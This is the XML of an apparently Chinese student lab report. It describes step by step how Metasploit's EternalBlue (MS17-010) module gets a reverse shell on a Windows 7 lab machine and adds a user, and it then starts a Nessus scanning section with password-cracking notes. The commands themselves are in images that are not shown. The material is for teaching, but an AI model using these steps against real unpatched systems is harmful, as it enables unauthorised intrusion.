          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:t>模块使用流程如下</w:t>
      </w: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445760" cy="4371975"/>
            <wp:effectExtent l="0" t="0" r="15240" b="22225"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId57"/>
                    <a:srcRect r="360" b="3558"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5445760" cy="43719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我们先扫描目标是否存在 ms17-010 漏洞</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lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6005195" cy="2908300"/>
            <wp:effectExtent l="0" t="0" r="14605" b="12700"/>
            <wp:docPr id="8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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId58"/>
                    <a:srcRect r="-21" b="6854"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6005195" cy="2908300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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使用 use 命令选中这个模块，查看模块需要配置的信息</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6423025" cy="3260725"/>
            <wp:effectExtent l="0" t="0" r="3175" b="15875"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId59"/>
                    <a:srcRect r="400" b="5559"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6423025" cy="326072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设定目标主机</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开启我们的win7靶机查看ip</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676140" cy="4044315"/>
            <wp:effectExtent l="0" t="0" r="22860" b="19685"/>
            <wp:docPr id="9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56"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId60"/>
                    <a:srcRect r="1125" b="3784"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4676140" cy="4044315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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011545" cy="4490085"/>
            <wp:effectExtent l="0" t="0" r="8255" b="5715"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId61"/>
                    <a:srcRect r="208" b="4565"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6011545" cy="449008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目标看起来易受攻击，也就表示存在相关漏洞</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查找攻击模块</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695315" cy="4283710"/>
            <wp:effectExtent l="0" t="0" r="19685" b="8890"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect r="356" b="4026"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5695315" cy="42837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第二个跟我们的目标信息最为匹配，我们加载它</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Eternalblue</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3919855" cy="2830830"/>
            <wp:effectExtent l="0" t="0" r="17145" b="13970"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId63"/>
                    <a:srcRect b="4354"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3919855" cy="28308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可以看到这个模块只有一个 target，所以默认就选择这个目标系统。不需要手动设置</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p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pP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724525" cy="4551045"/>
            <wp:effectExtent l="0" t="0" r="15875" b="20955"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:srcRect r="198" b="4056"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724525" cy="4551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找一个 payload，获取 shell 远程连接权限后，进行远程执行命令，由于模块加载的时候默认指定了一个 payload</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hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5770880" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="20320" b="18415"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId65"/>
                    <a:srcRect r="110" b="9571"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5770880" cy="140398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如果不想使用默认指定的 payload，可以自己找一个 payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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066155" cy="4533265"/>
            <wp:effectExtent l="0" t="0" r="4445" b="13335"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:srcRect r="198" b="4495"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6066155" cy="453326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payload 又称为攻击载荷，主要是用来建立目标机与攻击机稳定连接的，可返回 shell，也可以进行程序注入等</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我们挑选一个反弹 shell 的 payloads</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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4156075" cy="3140075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:srcRect r="467" b="3694"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4156075" cy="3140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设置一下payload监听地址，然后开始执行</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285230" cy="2976880"/>
            <wp:effectExtent l="0" t="0" r="13970" b="20320"/>
            <wp:docPr id="9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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:srcRect r="222" b="5958"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6285230" cy="2976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如果等待没有出现 shell 提示符可以敲一下回车</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直接执行的话会获得目标主机的 SEHLL</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使用 DOS 命令创建用户</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5715000" cy="1581150"/>
            <wp:effectExtent l="0" t="0" r="0" b="19050"/>
            <wp:docPr id="100"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 descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId69"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715000" cy="15811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显示乱码但是已经添加成功</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拓展：解决乱码问题（乱码是因为 windows 和 linux 的编码不一样导致的</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710555" cy="4283710"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8890"/>
            <wp:docPr id="101"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:srcRect r="-44" b="4026"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5710555" cy="42837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用户创建成功，查看拿到的用户权限</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3495675" cy="1095375"/>
            <wp:effectExtent l="0" t="0" r="9525" b="22225"/>
            <wp:docPr id="102"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3495675" cy="10953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关闭链接 Ctrl+c</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84470" cy="825500"/>
            <wp:effectExtent l="0" t="0" r="24130" b="12700"/>
            <wp:docPr id="10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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5284470" cy="8255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通过会话进行连接目标机</w:t>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br w:type="textWrapping"/>
      </w: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-j 表示后台执行 渗透目标完成后会创建一个 session 我们可以通过 session 连接目标主机</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80025" cy="3948430"/>
            <wp:effectExtent l="0" t="0" r="3175" b="13970"/>
            <wp:docPr id="104"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>
                    <a:srcRect r="-217" b="4162"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5280025" cy="3948430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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223635" cy="4638040"/>
            <wp:effectExtent l="0" t="0" r="24765" b="10160"/>
            <wp:docPr id="10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4" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId74"/>
                    <a:srcRect r="116" b="4799"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6223635" cy="463804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通过id进入会话</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619750" cy="4243705"/>
            <wp:effectExtent l="0" t="0" r="19050" b="23495"/>
            <wp:docPr id="106"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5" descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId75"/>
                    <a:srcRect r="551" b="3951"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5619750" cy="424370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退出会话保存在后台</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901565" cy="3681095"/>
            <wp:effectExtent l="0" t="0" r="635" b="1905"/>
            <wp:docPr id="107"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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:srcRect r="222" b="4172"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4901565" cy="36810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根据id结束会话</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="0"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5295265" cy="3979545"/>
            <wp:effectExtent l="0" t="0" r="13335" b="8255"/>
            <wp:docPr id="112" name="图片 112" descr="d60f82a200df40d185f549cca9ef85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d60f82a200df40d185f549cca9ef85e5"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:srcRect r="267" b="4131"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5295265" cy="3979545"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体" w:cs="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>、实验总结及心得体会</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Metasploit是一款强大的渗透测试工具，它可以帮助安全测试人员检测系统漏洞、攻击系统并取得系统控制权。以下是一些Metasploit渗透测试实践总结：</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掌握基本命令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Metasploit有许多命令，包括搜索漏洞、扫描目标、设置模块选项、生成有效负载等。熟练掌握这些命令，可以提高测试效率。</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学习漏洞分析</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对于Metasploit渗透测试，学习漏洞分析至关重要。掌握漏洞分析技能，可以更好地理解漏洞的利用方法和原理，从而更好地应用Metasploit工具。</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熟悉各种漏洞利用方法</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Metasploit包含多种漏洞利用方法，包括缓冲区溢出、格式化字符串漏洞、堆溢出漏洞等。熟悉这些漏洞利用方法，可以更好地选取合适的利用模块，并提高攻击成功率。</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学习编写自定义模块</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Metasploit是一个开放的框架，允许用户编写自定义模块。学习编写自定义模块，可以更好地适应新的漏洞利用方法，同时也可以与其他测试人员分享自己的经验和知识。</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实践中勇于尝试</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在实践中，勇于尝试是非常重要的。Metasploit工具本身非常强大，但是在不同的环境中，不同的漏洞利用方法可能会有不同的效果。因此，在实践中，测试人员需要不断地尝试，不断地调整自己的方法，以获得最佳的渗透测试效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总之，Metasploit是一个非常强大的渗透测试工具，但是只有通过不断地实践和学习，才能真正掌握它的使用方法，并在渗透测试中取得最佳的效果。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p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pageBreakBefore w:val="0"/>
        <w:widowControl/>
        <w:kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct w:val="0"/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="-4" w:leftChars="-2" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pP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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>三：Nessus漏洞扫描实践</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1" w:right="-512" w:rightChars="-244"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pP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1、实验目的和要求</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Nessus漏洞扫描实践的主要目的是发现网络中存在的漏洞，以便组织或个人能够及时采取措施加强网络安全保护，提高网络安全性。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Nessus漏洞扫描是一种网络安全评估技术，旨在识别和评估网络中存在的漏洞和安全风险。它可以帮助企业和组织发现并纠正网络安全问题，提高网络安全性。以下是Nessus漏洞扫描实践的目的和要求：</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为了实现这一目的，Nessus漏洞扫描实践需要满足以下要求：</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确保扫描的准确性：Nessus漏洞扫描实践应该能够准确地扫描网络和主机，识别并准确地报告所有的漏洞，以确保漏洞得到及时的发现和解决。</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保证扫描的全面性：Nessus漏洞扫描实践应该能够扫描网络中所有的主机，包括隐藏和内部网络，以确保漏洞得到全面的发现和解决。</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确保扫描的安全性：Nessus漏洞扫描实践应该采用安全的扫描方式，避免给目标系统造成不必要的影响，同时保证扫描的安全性，防止被黑客利用。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提供准确的扫描结果：Nessus漏洞扫描实践应该能够准确地生成报告，报告中应该包括所有漏洞的详细信息，以及建议的修复方案。</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实现漏洞修复跟踪：Nessus漏洞扫描实践应该能够及时跟踪漏洞修复进度，并能够在需要时重新扫描系统以验证修复的效果。扫描准确性：Nessus漏洞扫描应准确识别网络中存在的漏洞和安全风险，并提供可靠的解决方案。</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安全性：在使用Nessus漏洞扫描工具时，应确保扫描的合法性，并避免对目标系统造成不必要的影响。</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及时性：Nessus漏洞扫描应及时进行，并及时跟踪漏洞修复进度，确保漏洞得到及时修复。</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专业性：Nessus漏洞扫描需要专业的人员进行操作和管理，以确保扫描结果的准确性和有效性。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综上所述，Nessus漏洞扫描实践需要保证准确性、全面性、安全性、报告准确性和漏洞修复跟踪能力，以便及时发现和解决网络中的漏洞，提高网络安全性。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总之，Nessus漏洞扫描是评估网络安全状况的重要手段之一，它可以帮助管理员及时发现和解决安全问题，提高网络安全性。在使用Nessus漏洞扫描工具时，应严格遵守要求，确保扫描结果的准确性和可靠性。</w:t>
      </w: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2、实验准备工作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Nessus是一种广泛使用的漏洞扫描器，它可以帮助安全团队发现和评估网络中的漏洞和安全问题。为了准备好Nessus漏洞扫描实践，您可以按照以下步骤进行：</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安装Nessus漏洞扫描器：您可以从Tenable官方网站下载并安装Nessus漏洞扫描器。安装后，您需要启动Nessus并设置管理员账户。</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了解您要扫描的目标：在开始扫描之前，您需要了解您要扫描的目标。这包括目标的IP地址、操作系统、服务、应用程序等信息。这些信息可以帮助您确定哪些漏洞可能存在于目标系统中，并设置扫描策略。</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创建扫描策略：在Nessus中，您可以创建自定义的扫描策略。您可以设置不同的扫描选项，例如漏洞类别、端口范围、扫描深度等。为了获得最佳的扫描结果，您应该根据目标系统的特点来创建相应的扫描策略。</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执行扫描：创建扫描策略后，您可以启动扫描。在扫描期间，您可以监视扫描进度和结果。扫描结束后，您可以查看报告并处理发现的漏洞。</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安排定期扫描：漏洞扫描不是一次性的活动，您应该定期进行扫描以确保网络安全。您可以设置Nessus漏洞扫描器定期自动执行扫描，或者手动执行扫描。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处理漏洞：扫描结束后，您应该处理发现的漏洞。这包括修补漏洞、配置安全设置、移除不必要的服务和应用程序等措施。您可以使用Nessus提供的建议来处理漏洞。</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Nessus是一款常用的漏洞扫描工具，以下是在进行Nessus漏洞扫描前需要做的准备工作：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安装Nessus：首先需要从Tenable官网下载Nessus软件，并按照安装向导进行安装。安装完成后，可以通过Web浏览器访问Nessus控制台。</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准备扫描目标：确定需要扫描的目标IP地址和端口，确保这些目标都处于运行状态。</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选择扫描策略：Nessus提供了多种扫描策略，例如全面扫描、快速扫描、Web应用程序扫描等。选择适合自己需求的扫描策略。</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配置扫描设置：在Nessus控制台中，可以配置扫描设置，例如扫描速度、扫描的漏洞类型等。</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开始扫描：设置完扫描设置后，可以开始进行漏洞扫描。扫描完成后，可以查看扫描结果并进行漏洞修复。</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定期扫描：定期进行漏洞扫描，以确保系统的安全性。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密码破解是一项复杂的任务，需要仔细的准备工作才能进行。下面是密码破解实验的准备工作：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了解密码学基础知识：密码学是研究加密和解密技术的学科，对于密码破解实验来说，了解一些密码学的基本概念和术语是必要的，比如对称加密、非对称加密、哈希算法、密钥等。</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了解常见的密码破解方法：密码破解的方法有很多种，包括暴力破解、字典破解、彩虹表攻击等。研究这些方法的优缺点、适用范围等信息，有助于选择正确的方法进行实验。</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选择密码破解工具：有很多密码破解工具可供选择，比如John the Ripper、Hashcat等。需要根据实验需求和实验对象选择合适的工具，并熟悉工具的使用方法和参数设置。</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确定实验对象：实验对象是指需要破解密码的目标，可以是本地计算机上的用户密码、数据库中的密码、网络中的认证密码等。需要选择一个适合自己实验的对象，并获取相应的密码信息。</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了解基本密码知识：在进行密码破解实验之前，了解密码的基本知识非常重要。您应该熟悉各种密码类型、加密算法以及如何创建一个强密码。</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选择密码破解工具：选择一个密码破解工具是非常关键的。有很多开源和商业密码破解工具可供选择，您可以根据您的需求选择适合您的工具。</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准备测试环境：您需要一个测试环境来执行密码破解实验。您可以在虚拟机中安装一个操作系统，或者使用一个实际的计算机，但是需要确保您不会破坏任何重要的数据或系统。</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选择目标密码：在开始密码破解实验之前，您需要选择一个目标密码。这可以是您自己的密码，或者您可以从网络上获取一个样本密码来测试。</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熟悉密码破解流程：了解密码破解的流程是非常重要的。这将帮助您在实验中更好地理解和处理问题。您可以在网上查找密码破解教程，了解密码破解的基本流程。</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eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>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记录实验结果：记录密码破解实验的结果是非常重要的，这将帮助您更好地分析和评估您的实验。记录密码破解工具使用的时间、破解的密码、破解的方法等信息。</w:t>
